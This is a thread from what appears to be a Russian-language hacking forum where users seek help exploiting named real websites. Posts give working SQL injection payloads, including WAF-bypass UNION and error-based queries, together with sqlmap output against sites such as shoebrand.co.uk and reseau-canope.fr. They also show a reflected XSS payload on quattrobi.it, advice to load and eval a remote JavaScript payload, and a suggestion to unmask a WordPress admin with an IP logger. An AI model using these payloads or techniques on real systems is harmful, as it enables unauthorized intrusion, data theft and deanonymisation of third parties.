Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Vulnerabilities in SharePoint could allow elevation of privilege
    Есть эксплоит ? и можно как то подключится и получить shell код на системе с этой дыйрой ?
    Везде пишется тип права повышать, а какой толк только.
     
  2. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    это джейсон но не стетхем
    сериализованных данных в нём нет, если ты об этом
     
    Octavian and Jerri like this.
  3. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Плавает и плавает, обычный JSON в POST-запросе.
     
  4. Lector

    Lector New Member

    Joined:
    17 Apr 2011
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Уязвимость найдена через форму поиска, параметр ' подскажите как раскрутить

    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL
    server version for the right syntax to use near '%'' at line 1 : SELECT COUNT(*) FROM
    `mstr_manageproduct` AS A INNER JOIN `mstr_products` AS B ON A.`product_id`=B.product_id 
    INNER JOIN `mstr_saller` AS C ON A.`saller_id`=C.saller_id WHERE 1=1 AND A.status='Active' AND
     B.`product_name` like '%'%'
     
  5. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Есть возможность узнать ip администратора сайта на wordpress?
     
  6. iGermi

    iGermi New Member

    Joined:
    11 Aug 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Здраствуйте, форум. Интересует возможность подключения сторонней JS библиотеки используя html тег <img>. Кто подскажет.

    Или любой другой способ использовать js на сайте forum.minecraft-galaxy.ru
     
  7. iGermi

    iGermi New Member

    Joined:
    11 Aug 2017
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Подкинуть ему ссылку на почту с айпи логером
     
  8. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Привет а как большой js засовывать, когда невозможно за тега а выйти?
    Code:
    <a href="https://" onmouseover="alert(document.cookie)" target="_blank">finiio</a>
     
  9. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    подгрузкой js пейлоада с внешнего сервера через XMLHttpRequest и последующим евалом
     
  10. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    можно пример
     
  11. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    буквально сегодня в соседней теме отвечал человеку с похожим вопросом
    https://forum.antichat.ru/threads/464058/
     
    Octavian likes this.
  12. Zyaba

    Zyaba New Member

    Joined:
    22 Mar 2016
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Можно подробнее? гугление ничего толком не дает.
    Есть усечение пути (с кучей /./.) - но это не то, как я понимаю.
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Помогите ваф обойти
    Code:
    http://www.reseau-canope.fr/climatscolaire/ressources/resultat-de-recherche.html?id=58&tx_cndpclimatsco_pi1%5Baxes%5D=0&tx_cndpclimatsco_pi1%5Bthemes%5D=0&tx_cndpclimatsco_pi1%5Blocalisations%5D=a_32+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    From фильтруется, помогите обойти)
     
  15. grelly

    grelly New Member

    Joined:
    26 Jul 2018
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, нашел SQLi, но при попытке раскрутки упираюсь в ваф Mod_security. Sqlmap при попытке атаки целевого url http://shoebrand.co.uk/index.php?route=product/category&path=64&limit=32 с использованием тампера between возвращает ошибку:
    [WARNING] HTTP error codes detected during run:
    403 (Forbidden) - 1 times.

    Найденные уязвимости:
    Parameter: path (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: route=product/category&path=64 AND 9469=9469&limit=32

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: route=product/category&path=64 AND SLEEP(10)&limit=32

    Может кто-нибудь помочь советом, в какую сторону нужно копать для раскрутки вручную?
     
  16. panic.ker

    panic.ker Member

    Joined:
    25 Aug 2013
    Messages:
    87
    Likes Received:
    69
    Reputations:
    3
    2 BabaDook
    Вероятнее всего потому, что в мануалах по дефолту так написано.

    2 grelly
    modsecurityversioned и modsecurityzeroversioned -тамперы под mod_security
     
    grelly likes this.
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    path=64 group by elt(rand(0)|0,version()) having avg(0)-- -
    Duplicate entry '5.6.39-83.1' for key 'group_key
    
    Почитайте больше про SQL инъекции, в особенности, про вывод в ошибке! А не про то как пользоваться sqlmap.
     
    dmax0fw, grelly and eminlayer7788 like this.
  18. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Там и с Union особых проблем нет
    Code:
    http://shoebrand.co.uk/index.php?route=product/category&path=64+AND+FALSe+/*!50000UniON*//*!50000SeLeCT*/1,version(),3+--+-&limit=32
     
    #2378 joelblack, 26 Jul 2018
    Last edited: 26 Jul 2018
    grelly, eminlayer7788 and cat1vo like this.
  19. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.quattrobi.it/ru/no_cache/proekty/view/project/168'.html?no_cache=1
    Можно что нить сделать?
     
  20. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    244
    Likes Received:
    450
    Reputations:
    145
    Маловероятно. На сайте присутствуют и другие уязвимости,можно попробовать посмотреть что то еще:
    Code:
    http://www.quattrobi.it/it/no_cache/prodotti/famiglia/?family[id]=98&marcatura="><script>alert(document.domain)</script>
     
    dmax0fw likes this.